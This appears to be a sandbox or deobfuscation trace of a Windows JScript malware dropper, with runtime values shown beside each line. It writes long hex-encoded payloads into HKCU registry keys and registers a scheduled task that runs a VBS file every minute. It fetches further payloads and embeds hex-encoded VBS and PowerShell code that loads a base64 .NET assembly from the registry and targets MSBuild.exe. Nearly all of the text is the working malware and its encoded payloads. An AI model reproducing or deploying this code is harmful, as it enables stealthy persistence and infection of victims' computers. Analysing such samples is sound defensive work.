B20000400000F7D79BA000007982B5040000000000000032C6ADA6C0F140000008B7200000D1F821110111200000D1F821110111D032F10063B200400000F7D79BA000007982B5040000000000000032C6ADA6D0F140000008B7200000D1F821110111200000D1F821110111D012F173C261116131600010618240000008B7200000D1F82111011120D002F1000000D8935111513120EFA690F140000008","REG_SZ") ➔ undefined
                                                                              • RegWrite("HKEY_CURRENT_USER\Software\YLhjFraZZwiadZg\donn\d9","615210000030D8710700A47E2741A00000B38280C0600010F137600000303B9370B0A00000B5826000A0A0000094820700F47E27A00010D182C1F100110000B40000309E008003B110000054000000010000303C0000300B00000031000000000000C114000000A20000EDA000003582009331A0000043825201ED0000FFFFCF5DE36011701170316D7170110000400000B008A0000094828311400000B0E78331A00000B7822A0700D48A27C1522A2311B1522A0700D4C727A1522AA11191522A0700D4262781522A111171522A0700F4B627615210000004D8D1E4C273117331F530EF61A000006582610700103327231130EF61A000006582610700103327A11123316000005F82B10000B0471311000000A000109482617141412AA00000B382A961C21181522A721171522A100000E4C87011615210000030D8910700B4122741A00000B382121193C263116331196103111331A00000B382A000007B820311F211E211D211D111C111A00000B382B1110331C971615210000008D871F23141E23141D231C211C231E1112AA00000B382A00000B382B2110211F11100007031A000107482A000108482A00000D282100000E40DA00000B382A00000B382A961511152C2531153311961F011B231A00000B382A000007B82F011A2119211821142113211A00000B3822211F031C971615210000008D881A23141923141823151115131B0112A72116211521172310700F4F5276231715231B0112A100000E4C8701161B011B03110000030D88142310700B412273231412231A00000B38212111231A00000B38280023161F131E111E13110000030D871D1310700823327C13141B131A00000BE82A131A00000C482A00000B382911100007031A000107482A000108482A00000D282100000E40DA00000B382A00000B382A961511152C2431143311961F0119131A00000B382A000007B82F01181117111611141113111A00000B3822111F031C971615210000008D8818131417131416131511151312A0700F4552771522A100000E4C87011615210000030D88141310700B412273131412131A00000B382801131A00000C482A00000B382011100007031A000107482A000108482A00000D282100000E40DA00000B382A00000B382A961B01152C2331133311961F0110131A00000B382A000007B82F011E011D011C011A0119011A00000B3828011F031C971615210000008D881E03141D03141C031B011B0312A0700F4B42771522A100000E4C87011615210000030D881A0310700B412279031418031A00000B38280000030228370315011603140115031904031A000107482A00000B382A000106482100000E4C871A00000B382A000007B8241414110000030D8610700B4902741A00000B38280D06162A00000AA82714141412A0700F4B327615210000030D8710700A47E2741A00000B38280C0600010F13760000030F99370B0A00000B5826000A0A0000094820700E43E27A00010D182C1F100110000B40000305D008003B110000054011060DD00920000000001100000A200000000EDA00000358200C031A0000043825201EDFFFFFF27E39011A011A0316D71A011400000B008A00000C482A00000B382A00000A482A00000B382B011400000B0E7B031A00000B7822A0700D48A27C1522AA0001045F6A0001035F6A0115011B1522A0700D4C727A1522AA0001045F6A0001035F6A011401191522A0700D4262781522AA0001045F6A0001035F6A0119071522A0700E4E527615210000004D8D10000005883A031801190317011803160117031AD71A0001025F6906031615031A00000BAF60700E4C427604031A00000BAF60700E4242760D0A00000BAF60700E403276000A0001015F6706000000000FE9380C0A00000B58270B0A0000094820700E44027A0001004820700D44F27A0A000009A3700110000A4000010A1005003B100003084000000C0000030C50000307400000010000000100000C114000000A200A00000358260C270A7A00000858208A00033026CEDA000004382100000544711EFF510EF6170F530EF616030EF41100000545702EDFFFFFF840000000000000020546010B2713003EFF160B080A3EDFFFFFFD5FFFFFFB5FFFFFF74FFFFEF0FFFFFEFFDFFFFEFECFFFFEF8CFFFFEFFAFFFFEFF9FFFFEF39FFFFEF77FFFFEFE5FFFFEFE4FFFFEF24FFFFEF62FFFFEFD0FFFFDFDFFFFFDF1FFFFFDF5DFFFFDFCBFFFFDFCAFFFFDF0AFFFFDF48FFFFDFA7FFFFDF07FFFFDF66FFFFDFC5FFFFDFB4FFFFDFB3FFFFDFB2FFFFDFB1FFFFDF01FFFFDF70FFFFCF6FFFFFCFFDFFFFCF6D000000000000005254B0618571700000005EDD0000400000B008A000009482E011400000B0E7C022F1E031A000009482A00000B7822A0700D48A27E1522AD011D1522A0700D46927C1522AA011B1522A0700D4C727A1522AB01191522A0700D4262781522AC01171522A0700D44527615210000004D890F10700C4ED27C012F1A031A00000A7F6F011A00000A882C002F1F031A000003982A0000058F6A011C0F1F1E03141C0E1F100A0000010F610000051579111D0C210000051579111C0D1F16DD2B111B131A00000FAF69111C0C1F1D031A00000EAF6A111C0B1F1A131100000F747A00000DAF69111D1B29131A00000CAF69011C0A1F100A0000010F610000051576111D0C210000051576111C091F16DD281118131A00000FAF66111C081F1A031A00000EAF67111C071F17131100000F747A00000DAF66111D1B26131A00000CAF68011C061F100A0000010F610000051573111D0C210000051573111C051F16DD251115131A00000FAF63111C041F1B031A00000EAF64111C031F141","REG_SZ") ➔ undefined
                                                                              36
                                                                              index ++;
                                                                                37
                                                                                }
                                                                                  38
                                                                                  }
                                                                                    39
                                                                                    function isDotNetFramework4Installed() {
                                                                                    • isDotNetFramework4Installed() ➔ true
                                                                                    40
                                                                                    var keyPath = "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\NET Framework Setup\\NDP\\v4\\Full\\";
                                                                                      41
                                                                                      try
                                                                                        42
                                                                                        {
                                                                                          43
                                                                                          var version = registryShell.RegRead ( keyPath + "Version" );
                                                                                          • RegRead("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP\v4\Full\Version") ➔ "4.8.04084"
                                                                                          44
                                                                                          return true;
                                                                                            45
                                                                                            }
                                                                                              46
                                                                                              catch ( e )
                                                                                                47
                                                                                                {
                                                                                                  48
                                                                                                  return false;
                                                                                                    49
                                                                                                    }
                                                                                                      50
                                                                                                      }
                                                                                                        51
                                                                                                        function createTaskScheduler(taskName, filePath) {
                                                                                                        • createTaskScheduler("YLhjFraZZwiadZg","C:\Users\totti\YLhjFraZZwiadZg.vbs") ➔ undefined
                                                                                                        52
                                                                                                        try
                                                                                                          53
                                                                                                          {
                                                                                                            54
                                                                                                            var taskService = new ActiveXObject ( hexToAscii ( constString1 ) );
                                                                                                            • hexToAscii("5363686564756C652E53657276696365") ➔ "Schedule.Service"
                                                                                                            55
                                                                                                            taskService.Connect ( );
                                                                                                            • Connect() ➔ undefined
                                                                                                            56
                                                                                                            var rootFolder = taskService.GetFolder ( "\\" );
                                                                                                            • 066656.GetFolder("\") ➔ \
                                                                                                            57
                                                                                                            var taskDefinition = taskService.NewTask ( 0 );
                                                                                                            • 066656.NewTask(0) ➔
                                                                                                            58
                                                                                                            var trigger = taskDefinition.Triggers.Create ( 1 );
                                                                                                            • Create(1) ➔
                                                                                                            59
                                                                                                            trigger.StartBoundary = "2024-02-20T00:00:00";
                                                                                                              60
                                                                                                              trigger.Repetition.Interval = hexToAscii ( constString2 );
                                                                                                              • hexToAscii("5054314D") ➔ "PT1M"
                                                                                                              61
                                                                                                              var action = taskDefinition.Actions.Create ( 0 );
                                                                                                              • Create(0) ➔
                                                                                                              62
                                                                                                              action.Path = filePath;
                                                                                                                63
                                                                                                                rootFolder.RegisterTaskDefinition ( taskName, taskDefinition, 6, null, null, 3 );
                                                                                                                • \.RegisterTaskDefinition("YLhjFraZZwiadZg",,6,null,null,3) ➔ \YLhjFraZZwiadZg
                                                                                                                64
                                                                                                                }
                                                                                                                  65
                                                                                                                  catch ( e )
                                                                                                                    66
                                                                                                                    {
                                                                                                                      67
                                                                                                                      return ;
                                                                                                                        68
                                                                                                                        }
                                                                                                                          69
                                                                                                                          }
                                                                                                                            70
                                                                                                                            function initializeVariablesAndProcess() {
                                                                                                                            • initializeVariablesAndProcess() ➔ undefined
                                                                                                                            71
                                                                                                                            processName = "4D534275696C642E657865";
                                                                                                                              72
                                                                                                                              directoryName = "YLhjFraZZwiadZg";
                                                                                                                                73
                                                                                                                                placeholder = "7B5B7D417070446F6D61696E7B5D7D3A3A43757272656E74446F6D61696E2E4C6F61647B287D5B436F6E766572747B5D7D3A3A46726F6D426173653634537472696E677B287D7B287D2D6A6F696E207B287D4765742D4974656D50726F7065727479202D4C69746572616C506174682027484B43553A5C536F6674776172655C7C706174687C27202D4E616D65202773277B297D2E73207C20466F72456163682D4F626A656374207B7B7D245F7B5B7D2D312E2E2D7B287D245F2E4C656E6774687B297D7B5D7D7B7D7D7B297D7B297D7B297D3B207B5B7D612E617B5D7D3A3A617B287D277C706174687C277B297D";
                                                                                                                                  74
                                                                                                                                  fileContent = "4F7074696F6E204578706C696369740A2750726F6A656374204E616D653A207C706174687C0A272044E9636C61726174696F6E20646573207661726961626C65730A44696D206F626A5368656C6C2C2077696E646F77734469722C20690A536574206F626A5368656C6C203D204372656174654F626A6563742822575363726970742E5368656C6C22290A77696E646F7773446972203D206F626A5368656C6C2E457870616E64456E7669726F6E6D656E74537472696E677328222577696E6469722522290A0A2720466F6E6374696F6E20706F75722076E972696669657220736920756E2070726F636573737573207370E9636966697175652065737420656E20636F7572732064276578E9637574696F6E0A46756E6374696F6E20497350726F6365737352756E6E696E672870726F636573734E616D65290A2020202044696D206F626A574D49536572766963652C20636F6C50726F6365737365730A20202020536574206F626A574D4953657276696365203D204765744F626A656374282277696E6D676D74733A5C5C2E5C726F6F745C63696D763222290A2020202053657420636F6C50726F636573736573203D206F626A574D49536572766963652E457865635175657279282253454C454354202A2046524F4D2057696E33325F50726F63657373205748455245204E616D653D272220262070726F636573734E616D65202620222722290A202020200A20202020497350726F6365737352756E6E696E67203D2028636F6C50726F6365737365732E436F756E74203E2030290A456E642046756E6374696F6E0A0A2720537562726F7574696E6520706F7572206578E9637574657220756E652073E97175656E636520646520636F6D6D616E6465732064616E7320506F7765725368656C6C0A5375622052756E506F7765725368656C6C436F6D6D616E647328290A2020202044696D20636F6C50726F6365737365732C206F626A50726F636573730A202020200A2020202027204C616E63657220506F7765725368656C6C20656E206D6F64652066656EEA7472E9206E6F726D616C0A202020206F626A5368656C6C2E52756E2077696E646F7773446972202620225C73797374656D33325C57696E646F7773506F7765725368656C6C5C76312E305C706F7765727368656C6C2E657865222C20320A202020200A202020202720417474656E6472652071756520506F7765725368656C6C20736F6974206C616E63E920657420656E766F7965722064657320636F6D6D616E6465730A2020202053657420636F6C50726F636573736573203D204765744F626A656374282277696E6D676D74733A22292E496E7374616E6365734F66282257696E33325F50726F6365737322290A20202020466F722045616368206F626A50726F6365737320496E20636F6C50726F6365737365730A2020202020202020496620537472436F6D70286F626A50726F636573732E4E616D652C2022706F7765727368656C6C2E657865222C20766254657874436F6D7061726529203D2030205468656E0A20202020202020202020202057697468206F626A5368656C6C0A202020202020202020202020202020202E4170704163746976617465206F626A50726F636573732E50726F6365737349640A202020202020202020202020202020202E53656E644B657973202E526567526561642822484B45595F43555252454E545F555345525C536F6674776172655C7C706174687C5C7622290A202020202020202020202020202020202E53656E644B65797320227B454E5445527D220A202020202020202020202020202020202E53656E644B657973202E526567526561642822484B45595F43555252454E545F555345525C536F6674776172655C7C706174687C5C636E22290A202020202020202020202020202020202E53656E644B65797320227B454E5445527D220A202020202020202020202020202020200A20202020202020202020202020202020575363726970742E536C65657020353030300A202020202020202020202020456E6420576974680A2020202020202020202020204578697420466F720A2020202020202020456E642049660A202020204E6578740A456E64205375620A0A2720426F75636C65207072696E636970616C650A466F722069203D203020546F20313030303020272052E964756974206C65206E6F6D6272652064276974E9726174696F6E7320706F7572206C6573206265736F696E732064652064E96D6F6E7374726174696F6E2E0A202020204966204E6F7420497350726F6365737352756E6E696E67286F626A5368656C6C2E526567526561642822484B45595F43555252454E545F555345525C536F6674776172655C7C706174687C5C69222929205468656E0A202020202020202052756E506F7765725368656C6C436F6D6D616E647328290A20202020456E642049660A202020200A20202020575363726970742E536C656570283130303030290A4E657874";
                                                                                                                                    75
                                                                                                                                    constString1 = reverseString ( "56369667275635E256C6574656863635" );
                                                                                                                                    • reverseString("56369667275635E256C6574656863635") ➔ "5363686564756C652E53657276696365"
                                                                                                                                    76
                                                                                                                                    constString2 = reverseString ( "D4134505" );
                                                                                                                                    • reverseString("D4134505") ➔ "5054314D"
                                                                                                                                    77
                                                                                                                                    if ( isDotNetFramework4Installed ( ) )
                                                                                                                                    • isDotNetFramework4Installed() ➔ true
                                                                                                                                    78
                                                                                                                                    {
                                                                                                                                      79
                                                                                                                                      tempString = fetchStringFromURL ( "s4.txt" );
                                                                                                                                      • fetchStringFromURL("s4.txt") ➔ "3D414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414D3841414141774141414145414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141414141345465734A57626C4E3363683943504B306750765A6D624A523363314A486476774449676F51442B6B4864704A58646A56326376774449674143494B3067507A56325A6C785761326C6D635152575A304E585A3146585A7939435067414349674143494B3067507649535A7A7857596D4A53507A4E585A6A4E5751705648496949585A72396D64756C3063684A535073566D646C78474973566D646C786B62766C4764314E575A3456455A6C5233636C5658636C4A48506741434967414349674169434E346A497A596E4C744E5859363032626A3143646D393263764A33597031574C7A4657626C6832597A706A6279566E49394D6E6273314765674D585A6E564762705A58617942465A6C5233636C5658636C4A485067414349674143494B30675035525861795633596C4E485067414349676F51442B49694D323553627A466D4F7439325974516E5A764E3362794E5761743179636831575A6F4E326336346D63314A53507A35476274684849765A6D624A523363314A4864384143494B3067507649436377466D4C753957613046325970784763774655654E4A53506C315759754269497734434D75416A4C78495350753957617A4A585A32425365306C47647556475A4A6C48626931575A7A4E5859384143494B30675069416A4C78495350753957617A4A585A575233636C5A5761754657626749534D323553627A466D4F7439325974516E5A764E3362794E5761743179636831575A6F4E326336346D63314A53507A3547627468484935786D59745632637A4647504B3067434E347A50694D585A354A53506C3532627346475A754647647A4269493430695255566C4939636D62705232626A35575A6749434D75456A4939343262704E6E636C5A4849733147652F777A76372B4F41414141414141414141414141426F4F41414D4775414141417741674C414144417541414D41344341784141414134474176425161414D48417942515A41594641674151654177474169425162415547417A4277634145454142414143416744414141414D413443417741674C414144417541514D4141414175427762416B47417A4267634155474157424164414D47413142415A4138474179424155414541414941414E414141416E42675A415147416E42675A415147416E42675A415147414141414141554741744251594134454130427759415548416B4277624149484151425141416F414130414141414141416C424165415547417541414E414944417741674D415944417741414F414944414141515A413047416842676241554741734251614159454173425159413447417042775A416B474179427754414541414E4167514141414141414141414141417A4277614149484168425162415547416B4251594149484155424162414547416E42515A4177454142415141416F43414141414E414944417741674D414143416741517141414341304241614163474170426763416B484177427762414D454141414164416747416E42516141494841354241634138474144424162414547416E42515A41774541424167454167454141414141415547413442515A413443413041674D414144417941674E414144413441674D414141416C425162414547414F42416241454741754267634155474130426762416B454142415144416F44414141414D413443417741674C414144417541514D41414141"
                                                                                                                                      80
                                                                                                                                      regValue1 = fetchStringFromURL ( "r4.txt" );
                                                                                                                                      • fetchStringFromURL("r4.txt") ➔ "00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000234D000000C000000600000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000300E2000300E2000300E20013000000E600F6009600370027005600650002009700C6002600D600560037003700140010008000830000000300E2000300E2000300E20013000000E600F600960037002700560065004700360057004600F600270005001000800043000000130007000700140037007700F6004600E60096007500000000005600D6001600E4004700360057004600F600270005001000C00083000000C600C6004600E200130007000700140037007700F6004600E6009600750000005600D6001600E6005600C60096006400C6001600E6009600760096002700F40010000100840000000000000000003700B60027001600D60056004600160027004500C600160076005600C40010001000A20000004300230003002300020002009A0002004700860076009600270097000700F600340000004700860076009600270097000700F6003400C600160076005600C4001000210084000000C600C6004600E200130007000700140037007700F6004600E6009600750000005600D6001600E400C6001600E600270056004700E600940010000100040000000300E2000300E2000300E200130000000000E600F600960037002700560065005600C600960064001000800003000000130007000700140037007700F6004600E6009600750000000000E600F6009600470007009600270036003700560044005600C600960064001000C000040000000000000000005600D6001600E4009700E60016000700D600F600340010001000220000000000000037004700E6005600D600D600F600340010001000A1000000030026004300030003000300030003001000002086000000F6006600E60094005600C600960064007600E600960027004700350010000020C8400B00000000000000E600F600960047001600C6003700E60016002700450000004000420000000000F6006600E60094005600C600960064002700160065001000000044000000000000000000000000000000200000004000000000000000F30000000000100000000000000010000000100000EFFE40DB0000000000F4006400E4009400F500E400F40094003500250054006500F5003500650000004330C20000000000000000000030C20000088500000084000000000010000000000000000000000000000008000003000000100010000000000000000000000000000008000081000000010010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100020052FF0000000000C6C646E2565627F63637D600E69616D4C6C64427F634F5000000000000000000000000264B0000000000000000000000000000000000000000000002000000262C00000000000000000000268A00264607E2130707143777F646E69675C57657265644C5A626F6C5130707143777F646E69675C54323032363038323C53747E656D65736F644C5E696D64616C53727563755C5A33400000010634D72C087DAE5B8245EDFAA65F09256354435250000000000000000000000000000000100000000000000000000000000004402"
                                                                                                                                      81
                                                                                                                                      }
                                                                                                                                        82
                                                                                                                                        else
                                                                                                                                          83
                                                                                                                                          {
                                                                                                                                            84
                                                                                                                                            tempString = fetchStringFromURL ( "s2.txt" );
                                                                                                                                              85
                                                                                                                                              regValue1 = fetchStringFromURL ( "r2.txt" );
                                                                                                                                                86
                                                                                                                                                }
                                                                                                                                                  87
                                                                                                                                                  inputFile = "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000003306000000C000200100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000A0D0E397C626D656373716F2C3A0D0A0D0E3D2D20202A0D0E39736E65646E656075646F2C30202A0D0E397C626D65637371447E65646E656075646F2C302020202A0D0E3F20202020202020202A0D022A222D35676165776E616C602020202020202020202A0D0226646136636364343134363265393536322D3E656B6F6459756B43696C626570702020202020202020202A0D022A222D356275747365647968636271427F637375636F6270702020202020202020202A0D02203E203E203E26322D3E6F6963727566702020202020202020202A0D02237C6F62747E6F634D2E6F6D6D6F634E23777F646E69675E24766F637F6273696D422D356D616E602020202020202020202A0D0222333E6967722D35607974702020202020202020202A0D097479647E656469497C626D656373716C3020202020202A0D0E397C626D65637371447E65646E656075646C302020202A0D0E39736E65646E656075646C30202A0D0D2D212C30202A0D0E3D2D2029227564716C60246E616020585023777F646E6967582023776F6C61696460246E6160237C6F62747E6F63602E6F6D6D6F636023777F646E696750227F666023756D65686470256C62616E65402D2D212C30202A0D0A0D0E3D2D20202A0D0E3E6F69647163696C6070716F2C30202A0D0E33776E696474756353777F646E69677F2C302020202A0D0E35627167714960746F2C356572747E3223776E696474756353777F646E69675F253030323F294D435F2D6F636E24766F637F6273696D6E23716D656863637F2F2A30747478622D337E6C6D687025627167714960746C3020202020202A0D0E33776E696474756353777F646E69677C302020202A0D0E3223367E2D63716A3D6F636D24766F637F6273696D6D23716D656863637A3E6275722D337E6C6D68702E6F69647163696C6070716C30202A0D0D2D212C30202A0D0E3D2D202E2769666E6F636E207071602279656864702E6960272565727477202F6470276E69647475637027276E696A796375625F64757149607448676968437D627F6643777F646E6967556C62616E65472025686470247563702F637C61602020202020202A0D00246C657F6863702C276E69647475637023796864702F647E696024707F602471686470263E24302B627F67756D6162764024554E4E20276E6964756762716470237E6F69647163696C60707160237D627F664023777F646E6967502E2E696024707F602F64702020202020202A0D002465656E60247F6E602F6460246E616025627167716D29405440297C6C61636964716D6F6475716025627160237E6F69647163696C607071602926405758202E6F696471646E657F66402E6F696471647E65637562705023777F646E6967502E23794054402020202020202A0D0275686769686024716023777F646E69675029726024656C61636370297C6C61636964716D6F64757160256260247F6E602C6C696770246E616025627167716D294054402379602E6F69647163696C60707160256864702471686470237564716369646E69402D2D212C30202A0D0A0D0E3974796C6962696471607D6F636F2C30202A0D0E3E6F69647163696C6070716F2C302020202A0D0A0D0E3D2D2E3F20222D7169316531316035346668343D253169326D283566643D233266626D22313167366035683B722D346940235F446564727F607075737C3D2D212C3020202020202A0D0E3D2D2020313023777F646E6967502D2D212C3020202020202A0D0A0D0E3D2D2E3F20222D7837316460346636603463383D226265393D293332343D213560383D26373366373636613B722D346940235F446564727F607075737C3D2D212C3020202020202A0D0E3D2D20213E283023777F646E6967502D2D212C3020202020202A0D0A0D0E3D2D2E3F20222D7833356631643164346936346D236931626D213434343D293263353D23356832366231643B722D346940235F446564727F607075737C3D2D212C3020202020202A0D0E3D2D20283023777F646E6967502D2D212C3020202020202A0D0A0D0E3D2D2E3F20222D7163393665323230343432316D246235683D246266643D263934653D21693268333135333B722D346940235F446564727F607075737C3D2D212C3020202020202A0D0E3D2D20273023777F646E6967502D2D212C3020202020202A0D0A0D0E3D2D2E3F20222D7036633463356565646830303D256665316D253363343D263435313D27353431313032356B722D346940235F446564727F607075737C3D2D212C3020202020202A0D0E3D2D2021647379665023777F646E6967502D2D212C3020202020202A0D0A0D0E3D2D202E247E656D6E6F6279667E6560256C62696471607D6F636024737F6D602568647024656473656C656370297C6C61636964716D6F64757160202020202020202020202A0D002C6C69677023777F646E696750246E616023747E656D656C65602564716962707F627070716025686470247E656D6D6F636E65502E28647967702B627F67702F647024656E676963756460237960202020202020202020202A0D037960246E61602E6F60246564737564702E65656260237168602E6F69647163696C6070716023796864702471686470237E6F69637275667023777F646E69675025686470266F602473796C6021402D2D212C3020202020202A0D0E3E6F69647163696C6070716C302020202A0D0E3221367E2974796C6962696471607D6F636A3D6F636D24766F637F6273696D6D23716D656863637A3E6275722D337E6C6D68702974796C6962696471607D6F636C30202A0D0A0D0E3F666E6944737572747F2C30202A0D0E39747962757365637F2C302020202A0D0E337567656C69667962705465647375657175627F2C3020202020202A0D0E3F202225637C6166622D3373756363614965702222756B6F667E694371622D3C6566756C602C6566756C4E6F696475736568754465647375657175627C30202020202020202A0D0E3D2D20202020202020202A0D0E2974796C6962696471607D6F636020202020202020202020202A0D03746271677B63616260227F66602E6F6964716A796C6165747279667023796864702375627965717562702E6F69647163696C6070716022757F6970266960247E656D656C6560237968647025667F6D65625020202020202020202020202A0D002E2E6F6964716A796C61657472796670297274737967656270246E6160256C696660256C6261637964602C6C696770247E656D656C65602C6566756C4E6F6964757365687544656473756571756270276E69697669636560735020202020202020202020202A0D0A0D0E3F202225637C6166622D33737563636149657022256C62616C6961667144737568676968622D3C6566756C60202C6566756C4E6F696475736568754465647375657175627C30202020202020202A0D0E3F202225637C6166622D33737563636149657022227F6471627473796E696D646145627965717562722D3C6566756C60202C6566756C4E6F696475736568754465647375657175627C30202020202020202A0D0E3F202225637C6166622D3373756363614965702222756B6F667E694371622D3C6566756C60202C6566756C4E6F696475736568754465647375657175627C30202020202020202A0D0A0D0E276E69677F6C6C6F666025686470266F60256E6F60286479677025646F6E602C6566756C4E6F69647573656875446564737565717562702020202020202020202020202A0D00256864702563616C607562702C6566756C602C6F62747E6F6340247E657F63636140227563755023777F646E6967502568647025676E616863602F6470247E616770257F69702669402020202020202020202020202A0D037E6F6964707F4024737566696E616D40234145502D2D212C30202020202020202A0D0E3223367E2D63716A3D6F636D24766F637F6273696D6D23716D656863637A3E6275722D337E6C6D6870237567656C69667962705465647375657175627C3020202020202A0D0E39747962757365637C302020202A0D0E3222367E2D63716A3D6F636D24766F637F6273696D6D23716D656863637A3E6275722D337E6C6D68702F666E6944737572747C30202A0D0E3F222070716E2E6F69647163696C607071497D422D356D616E6022203E203E203E21322D3E6F696372756670297479647E656469497C626D656373716C30202A0D0E3221367E2D63716A3D6F636D24766F637F6273696D6D23716D656863637A3E6275722D337E6C6D687022203E21322D3E6F696372756654737566696E616D60297C626D656373716C3A0D0E3F32283D266475722D376E69646F636E656022203E21322D3E6F6963727566702C6D687F3C3FBBBFE0000000300E2000300E2000300E20013000000E600F6009600370027005600650002009700C6002600D600560037003700140010008000830000000300E2000300E2000300E20013000000E600F600960037002700560065004700360057004600F600270005001000800043000000640065009500550014006400650045007500640074004500570097006600770047007600660057009700650034007400740064009500000000005600D6001600E4004700360057004600F600270005001000C100850000000000560087005600E200A40014004600570005009500440086007400E6006400D600C600A50075005500860077006600C60000005600D6001600E6005600C60096006400C6001600E6009600760096002700F40010009100A50000000000000000003700B60027001600D60056004600160027004500C600160076005600C40010001000A20000001300230003002300020002009A0002004700860076009600270097000700F600340000004700860076009600270097000700F6003400C600160076005600C40010002100840000000000560087005600E200A40014004600570005009500440086007400E6006400D600C600A50075005500860077006600C60000005600D6001600E400C6001600E600270056004700E600940010009100250000000300E2000300E2000300E200130000000000E600F600960037002700560065005600C60096006400100080000300000064006500950055001400640065004500750064007400450057009700660077004700760066005700970065003400740074006400950000000000E600F6009600470007009600270036003700560044005600C600960064001000C100060000000000000000005600D6001600E4009700E60016000700D600F600340010001000220000000000000037004700E6005600D600D600F600340010001000A100000003002600430003000300030003000300100000200D000000F6006600E60094005600C600960064007600E6009600270047003500100000204F400B00000000000000E600F600960047001600C6003700E60016002700450000004000420000000000F6006600E60094005600C600960064002700160065001000000044000000000000000000000000000000100000004000000000000000F30000000000100000000000000010000000100000EFFE40DB0000000000F4006400E4009400F500E400F40094003500250054006500F50035006500000043304900000000000000000000C0B5002042430000000000000000000030490020020A00000009000000000010000000000000000000000000000008000086000000100010000000000000000000000000000000000008000000000010000000000000000000000000000008000083000000100010000000000000000000000000000008000005000000810800000200000001002000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000004020052FF0000000000C6C646E2565627F63637D600E69616D456875427F634F50000000000000000000000203104000000000000000000000000000000000000000000000200002031E400000000000000000020314381E0100040208120202081E0808080E0B070D0C9082181803070702050D120200A08110A081150D1132181E0A0703149082110A0502020202020202020202020202020202020202020E0E0E0E0E0E0E0E0E0E0E0E0E0E0E0E0E0E0E0E0E0A0A270C209082110A050A0107030912181D7282120008080808000E14070708110DA2811516081101621515048082110A050E000E110100360E0E0E0D120006051182120818110DA28115120E0E0E0E088082180880821D1513821E059182148082120202020E0D1E080E0D120E0E0D12020E0E0F1706353E463DA6583FB138080D11010005020A0E001801040008080E010004080A010004080113811D03811903811E080106000F020E02080808060708020808080E0D1E0D16070A02020808080808080E09070B02020808080E060708080808080407060E0D120E0D101202080808020208080E0D18080808020017051B0E01000404711D130103811A01000608711D130808070702020202020208080202020208080A04711D1A080A08080808711D10120B0807020808080204270B2808050D1E0300270103811B010006010381110381180200090C711D1305B18215B18215B18212000B0103811701000601038116040103811801000601038111038111038112000B020808070702020202020202020202020208020A0D1A080A0808080C711D10120B0807020808080327092808020B0808080B08070A08050D1A0200060202080808020202020808080208050D1808080A031706120208080802080808080A070C05118212020E020E020E08070C000E110704020E0205C28219C2821E0DF2821E0E0907011E0E09221E0407070591821000250D51821000250E0E09221E0E0507080E01D2821100260E05C2821100260E0E0205C28219C28215070B0E010A03020E0DF282130707051182180806080E050D150D1961821E0E0B07031511821E02020202020E0C120D19121D1E0D1C1D1C1D1C19121D1E0D1C1D1E080C1D1E09121C1C180C1D1C1D1E09121C1E0C19121D1E0D1C1D1C1D1E09121C1E0C